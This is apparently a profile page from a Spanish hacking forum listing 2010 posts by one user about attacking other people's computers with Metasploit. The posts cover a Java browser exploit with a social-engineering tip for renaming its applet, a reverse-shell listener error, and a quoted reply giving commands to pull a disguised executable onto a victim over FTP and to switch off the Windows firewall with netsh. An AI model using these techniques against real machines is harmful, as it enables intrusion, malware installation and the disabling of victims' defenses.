Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - illera88

#11
El primer sitio donde se vió claramente como funcionaba el bug fue en este blog:
http://metasploiter.blogspot.com/2010/12/bug-hotmail-al-descubierto.html

Luego ya en el de "alguien" y luego en el tuyo...

Pon la fuente ;);)

Un saludo shell root!
#12
Cita de: Shell Root en 13 Diciembre 2010, 17:21 PM
hahahahaha que inocencia al usar OPERA, damos click en abrir. XD!

NOTE: don't use java_basicservice_impl in browser autopwn because it doesn't work in an iframe against IE and causes popups in other browsers


En ópera, firefox y chrome salta el aviso pero igual que con un java-drive-by y a todo el mundo le encanta...

Funcionar funciona perfectamente que es lo que se quería demostrar.
Luego ya cada uno puede utilizar la ingeniería social para cambiar el nombre del archivo java a uno más asequible como "certificado de seguridad" o lo que desee.
Se puede modificar desde el source del code del exploit.

Un saludo shell root y gracias porque mediante tus tutos empecé con metasploit. Te invito a visitar el blog www.metasploiter.blogspot.com ;)
#13
Buenas a todos. Os dejo este videotuto que he encontrado en un blog
Espero que os guste.

CitarAquí os dejo mi primer videotutorial para que podáis ver como se hace una explotación del exploit de java_basicservice que aun tiene un buen ratio de explotación ya que la mayoría de los usuarios aun no han actualizado a la ultima versión de java (6.22).

Espero que lo disfruteis.

[youtube=425,350]http://www.youtube.com/watch?v=jlQN9eMme1I&hd=1[/youtube]

Fuente: www.metasploiter.blogspot.com
#14
Shell root o jhu nunca habeis probado un exploit en WAN y os ha pasado esto???
Un saludo ;)
#15
Hola a todos. Estoy usando el ultimo exploit de java que es de browser. En LAN lo lanzo y hago funcionar sin problemas pero en WAN tengo alguno.

Ya lo he hecho funcionar bien pero el problema es que cuando paro el servidor y lo vuelvo a lanzar el exploit (he matado el trabajo que estaba en segundo plano con "kill 0") lo vuelvo a lanzar y me lanza este error:

Citarmsf exploit(java_basicservice_impl) > exploit -j
  • Exploit running as background job.
    msf exploit(java_basicservice_impl) >
    [-] Handler failed to bind to XX.XX.207.83:5000
  • Started reverse handler on 0.0.0.0:5000
    [-] Exploit exception: The address is already in use (XX.XX.207.83:5000).
Si cambio el puerto me funciona es decir que si cambio el 5000 por el 6000 vuelve a ir bien pero si relanzo el exploit despues de pararlo otra vez tengo el mismo problema... y tampoco quiero ir teniendo miles de puertos abiertos... quiero usar siempre el mismo.

Qué es lo que pasa????
He probado con rexploit y lo mismo....

Un saludo y gracias
#16
Hacking / Re: Subir y ejecutar exe en shell remota
15 Noviembre 2010, 03:03 AM
joooodeeerrr... con lo facil que es con el metetreper....

Entonces no existe ningun comando para desgargar algo de una URL???
un saludo y gracias
#17
Hacking / Re: Subir y ejecutar exe en shell remota
14 Noviembre 2010, 23:06 PM
Cita de: XXX-ZERO-XXX en 14 Noviembre 2010, 22:24 PM
Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones
ftp ftp.webcindario.com   ( por ejemplo)
te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner:
dir   --> lista los archivos en tu ftp
get server.zip  C:\server.exe

Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye

y luego ejecutas el server.exe si es lo q querias hacer..



pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell:  %windir%\System32\netsh.exe firewall set opmode disable


Muchas gracias por tu ayuda pero si ya necesito historias de andar abriendo puertos, desactivando firewalls... Se que lo del firewall no es más que un comando (suponiendo que usa el firewall de windows y no el del AV...) pero luego para abrir los puertos???
No se puede de la forma que te digo descargando directamente el archivo de un hosting (por ejemplo localhostr o el que sea...) y luego ya ejecutando el exe mediante linea de comandos???
Gracias de nuevo!!! ;-) ;-)
#18
OK. Lo de tener acceso al router está claro... Pero después ahora que estoy pensando la verdad es que no me parece tan facil conseguir una shell remota de algun host...
Había pensado en el ataque al puerto 445 con el metasploit y el exploit ms06_netapi... pero está reparcheado...
El resto suele usar fallos en software ( adobe, flash, java...).

La pregunta es: cual sería entonces el paso siguiente si se quiere obtener una shell de los equipos que están en LAN??? (y busco algo seguro como seria el ms06_netapi sino estuviese reparcheado... no cosas como exploits de java, adobe y company)

Un saludo

PD: tampoco me vale autopwn o pasar el escaner de puertos al msf... Quiero hacer las cosas por algo y no lanzar la metralleta de exploits por ver.... Hay que ponerse retos!!!
#19
Hacking / Re: Subir y ejecutar exe en shell remota
14 Noviembre 2010, 02:22 AM
El video está muyu bien.... eso ya lo habia hecho pero lo que tengo es una shell. No la session de metetreper ya que tu usas el PAYLOAD de metetreper y yo el de shell/reverse_tcp...
Y claro el comando upload no está en la shell(consola msdos de toda la vida).

Lo que he pensado es que tiene que existir un comando para descargar un archivo por linea de comandos...
Algo como el wget de linux de toda la vida...
Entonces subiria el archivo a cualquier hosting que acepte exe y luego lo descargaría y ejecutaría por linea de comandos... Sabéis como se hace eso???
O lo que dice xxx-zero-xxx desde un ftp pero no se el comando para descargar nada desde la consola :S:S
Aver si alguien me lo dice.
Gracias
#20
Hacking / Subir y ejecutar exe en shell remota
11 Noviembre 2010, 02:52 AM
Pues eso es lo que estoy preguntando:
Consigo sin problemas una shell en metasploit haciendo un ataque en WAN. Utilizo el payload shell/reverse_tcp ya que el metetreper en el exploit que yo uso no tiene buenos resultados. Al caso, simplmente quiero una vez que ya tengo la shell subir y ejecutar un exe. He buscado pero no he encontrado exactamente el comando para hacerlo...

Alguien sabe como hacerlo???
Gracias ;);)